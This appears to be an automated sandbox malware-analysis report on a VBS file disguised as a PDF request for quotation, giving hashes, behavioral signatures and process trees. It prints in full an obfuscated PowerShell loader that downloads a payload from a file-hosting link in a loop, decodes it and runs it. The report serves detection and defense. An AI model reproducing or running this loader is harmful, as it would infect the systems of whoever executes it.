Analysis
-
max time kernel
149s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
18-11-2024 09:08
Static task
static1
Behavioral task
behavioral1
Sample
Fluor RFQ1475·pdf.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Fluor RFQ1475·pdf.vbs
Resource
win10v2004-20241007-en
General
-
Target
Fluor RFQ1475·pdf.vbs
-
Size
15KB
-
MD5
695ec6cd0d4d8abaab5bed4e4f37153d
-
SHA1
027b2b36b69e9f41bc5b54493533d8b417192255
-
SHA256
3bb02f08d2d70b6f126d045a385a241330dbe96689304c48f1b9a1958297a060
-
SHA512
36a68f1693a03903990cf86eafe285cacab31b8b89a2a7c033e06545942604d8c735f4ff4d15d33c77e83379d74064954cd12a5fcb1bc3ea2b6cc289ef63ae1c
-
SSDEEP
384:aCTCJn/NHU8wde1pmZaKHQtL1YNBcYK7CB7qdgcKU:JuJnFH/w6pmmtl5WB7qm8
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2756 WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2204 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2204 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2756 wrote to memory of 2204 2756 WScript.exe 30 PID 2756 wrote to memory of 2204 2756 WScript.exe 30 PID 2756 wrote to memory of 2204 2756 WScript.exe 30
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fluor RFQ1475·pdf.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Estivate Electrochronographic Kldet denationaliseringernes Decanting Sstridskrfters #><#Hundjvel Ubeslutsomstes Skvhovedet Sammenligningerne Indstuderingens #>$Bebyrdelsen='Undervisningsbruget';function Koffardifart($Enqueter100){If ($host.DebuggerEnabled) {$Rhamnal=4} for ($Fichu=$Rhamnal;;$Fichu+=5){if(!$Enqueter100[$Fichu]) { break }$Chaetosomatidae+=$Enqueter100[$Fichu]}$Chaetosomatidae}function Poppied($Platanista147){ .($hjertesorg) ($Platanista147)}$Elskoven=Koffardifart 'Thaun FeoE ,ertD la.UnleWRoboEJenfB.alecBe al GecINskeE ilfnKa at';$Ndtvungne=Koffardifart ' BorMFriso .ekzUd,aiK.ntlNonplmacra Tan/';$firemandswhistens=Koffardifart 'Sca TMyxolJossssu p1Gal 2';$frugtstand='Tera[ PilnBraneRe eT ver.VrinSF,adEInfoRUnmevInc.iOpslcUnaceB,rtp dgao ufiI KjeNPosttSa tmbylda Unvn,deiAPlatGTeleeD cyrCrts]Fejd:Hyme: barS Be EDownCmonsuMonyr Seei scaTAll yKrydpChooRDomiosvvetSka OTydeCPurpoForbLCant=Perf$ BarfIpabI droRvarieOxheMFa.raFrkhN ystdspigSErotwSkulHUnboISeeaSMolrT eucEpaafN tr.s';$Ndtvungne+=Koffardifart 'Poe,5genn.Data0Imp Uncl(UdklWAppriE hvnFrp dGearo pirwOxalsVulk sl.tNFishTMa n Trop1Kim 0S ud.Teos0over;.onp KoreWRepoiFeo nAngl6Pavi4sche; re. No oxSylt6Rvrd4 G.r; and G derTermv la:Mund1 Mar3A ri1Forb.unco0,ret)Trgh BedsGOpvie LemcMiddkDa aoFacs/,jov2Gosc0Reas1Hamp0,sym0Sk b1 Act0Subs1 Ich I faFA riiNon rSucce R sfSquuo A hxU.vo/Mass1m,ch3R.bb1Free. Tar0';$Oligoprothetic=Koffardifart 'RameU Jo s LifECom RThil- Wala ortgPrineMa.tnmumbt';$Valsede=Koffardifart 'Mangh afrtFl atAktip PedsLin :Mcen/Katu/Pl nd msarJuleiThe,vCirceBur .AmangIrraoUnd oP.otgenerlSkifeFord.MetacDiffo esmKamm/Folku.irtcCru ?App e.krmxKiddpUn,eo m nrAfbitProa= tatd TwioCorpwHortn RumlN rvoFaldaEk odRis &Eye iRevadUdry= .yg1E brgmonsxProb2 He EAssuzH mm0Valgd AnaXKar.C irc3H ndz f rOP.ee3Pels4Clem2Sm t-BlyaR Un x BrakSkinEAitsc al4Gol,d Do,-EcocMOverHDdssYSeptA.schkReim-TrespErhvE';$tttekammen=Koffardifart 'Hibe>';$hjertesorg=Koffardifart 'OveriNat,e Immx';$Redirigeringers='Risskov';$Tilbagekaldelsesordningen='\Houting.Gha';Poppied (Koffardifart ' id$Be tg P.pLS,bsoKor.bBlaaATenelProd: .nfS,anct,oolORettFDegeMsoapN RenGForeDSpeceFastsComm=R ta$NarceSaddNPrisVfrdi:E,hia Pr P TycPEskoD PatAReditKursAVan,+ Aha$ sk tSk biSu sl SkrbApana mrG naeDa.sk uraFi sLLaveDNeurECanclSkotS ondEBa dSPar OdeteRVegeDAcann ModI.aminHalfg TaoeNo mN');Poppied (Koffardifart ' sse$AlpeG Sk LLnenOAn mBOposa HonLLn t:PencodefiVSammeG,eaRSupebAyelYErhvGT mbnU exI utNForbGUlve=Obse$wareV Fl a enlEnr S epELuxedCon ERef..TelesGeompMozalUncoiSpejtFetu( Nar$Teo,t weat xtTBij eIdeak Sa aUns MMetoMSte ESkrinSttt)');Poppied (Koffardifart $frugtstand);$Valsede=$overbygning[0];$Brontosaur=(Koffardifart ' Lod$Skr g PolL ungODisaBPhota,joeLKlu :.vanBSte ROverE SunM Ko e feslT rpYSad =MellNZoneeGr.lWTilb-Ko tOFr lbmaskJHypoeNarccPattt Bag nseSbuchy,ubpsKazaTSemiE,cytMUnsp.E bl$StoreLay,lSydsSMar.K OutoPsalVbi.eet.lgn');Poppied ($Brontosaur);Poppied (Koffardifart 'Nive$KrypBRep,r cateTilsmDealeU velAlkyySt m.St,rHPrede O ea entdClaueBootrhac.s Dis[Ro,a$FrisOsa tl freiJe ngD,lioSpndp unerEndaoStettEr.ch S aeCu etWieni OricStal]Unde=Occi$receN rnd memtBeslvT avuS ojnlabig DamnForee');$Rubiginose=Koffardifart 'Triv$Ka mBPa er PaneKommm GrueI del ,ney eur.StraDAlkaoFremwH.linSi pl tao Bygaud,bd derFNontiUautlHaggeSste(Opve$BoolVVildaF sslEnnosP ile,ogodLogae Un.,Af.a$FuliAMahdmDalep CarhN.rdi .hig .quaProfm Disa StreOpa )';$Amphigamae=$Stofmngdes;Poppied (Koffardifart ' Sta$Sun gC deLsounOpauebOsteaKaftL Tan:s,yrbPrveuGamiTPhenIMaskkBezaSUbefSAmniT MonrGe tUVenikRecuTPlanUSpinRNo.b=Indl(Abnot ette ResSWl dt Kat- ConPBakkaLayeTTam HOps Rddi$ ArtAkonomH reP SkuH rdeIA,tigSupeAazalMHoglAGauceTrkk)');while (!$Butiksstruktur) {Poppied (Koffardifart 'Kall$ izzgt wblIndsoBi dbIndta DomlDobb:SlumS,mtalbackaOpstgFutut SpeeNivekMetrvAcutgUnca=G,ft$PleaMBefoyArguoPapinUncueMakauBasers mioDisomPalaa') ;Poppied $Rubiginose;Poppied (Koffardifart 'Trsts,kdetBayoASludr PartOutw-DiffsTot L BaleHemoe,krip B o Stor4');Poppied (Koffardifart ' Ind$ KobGDennLdesuocompBShoca Krol Un.:T rrbTreauTricT G.nIAer k ,yoSM lisDe at palrCrosuBaankunlotDisrUGarvr Tr =Slip( PretOvereAmniSas etSkri-U biPMenuaEkspTSerbHur t Aut$ AkkANomeMGuttpRetuhAdamiCompgvatiA mpaMAteiaEtouEAneu)') ;Poppied (Koffardifart 'Nemo$OvergKautLStroO LanB enta eziL Cha:G spSIndePRanuIarveRReariVisstRefoe Ki d UdflfljtyRask=Quat$AuragEquiLO riO LvsbBesyA cholPest:Ta gP SelIF emLH,rmT Para Na SSloyTTakte ukaRUndeS Ech+Afid+ Thu%Lok $SammO revOficEAislRSculBOmvey ForG RhaNA.toIUnocNHorsgse,v.AumeC Hi oAnt U asyNLe pT') ;$Valsede=$overbygning[$Spiritedly]}$Adventistens=301189;$Abetment=30028;Poppied (Koffardifart 'Omba$ Klag BruL fesobumbB Hyracar.L N n:Arr KSalvnFlytkByggBpresRAutod Ta eMollN.kolE Kr ept=Ekst Sli,GHel.E nteTToym-In,ocHemooK rlnConst irceVveiN omaTSur dea$Aft AIndlMHn ePfrimh mbriBotoG Co.A DaaMFly aPeasE');Poppied (Koffardifart 'Rr r$DogsgCy.llKr eoBranbPa.ma anlStap:MaryH UbeoemblfRandjFemog irae .aarBrndmKanaeTillsBatttExcerNedneEnvinAkseeBe a Foo= tje For[,sonSOlanyLudbs rictH skeg ycm For.PeebCBeslo S mnMatevR,toe SkurTegnt,ene] lar:Hjer: GniFReforAggeoDivimO,hrBBillaDe esTo veSila6Scle4FestSkejst linrI,pei IntnMu tgSt l( Unr$SwigKKrosnNo.skCatabR skr WhidTe re DivnRivee Gen)');Poppied (Koffardifart 'Tec $tolvgEnjelUpdroIntubWeatAS lll Un,: SabeFriglPr dV KeraEnnuN DagiWheet RreIPresCEven Eme=Orib Micr[ entSSav YdjvlSGregTFuldeThe MAgno.Te et LaneProcXCigaT Ph .Tetae MisnNsebCMe aofor DAnt.IskrmNRumfGNon ]Reng: Bam:.nphAP.roS Fa cAfteidiphi Sik. GolgPrene fr TRadiS ermTBdeprElitIKomfnSaksGBer ( us$Opp.h onsoRoguFBetwJS,orGBundeAfteRSl gm CuleKlipsbillT,terr SkaEBluenforme t i)');Poppied (Koffardifart 'B id$Va.aG BegLStilOPropB,uria DanLMagi:Lo sz illYstorgAfgaOUdfrdOejeaMortcSwirtunamY FleLTubii Res=U se$,rade arelUndev.redaHas.NFolkIEuorT kroiSpikCKvar.Pr.aSGeleu tomb ofeS ,poTJonsr ulI H pn yldGRo,b(Cyma$Mae ASandd,usaVgushEMellN aaht Enci TokS peT,oleE yggn Su s Bed,koda$ ,umAUnwhbcente Bilt .nbmAmirEDiskNSym THasp)');Poppied $zygodactyli;"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2204
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b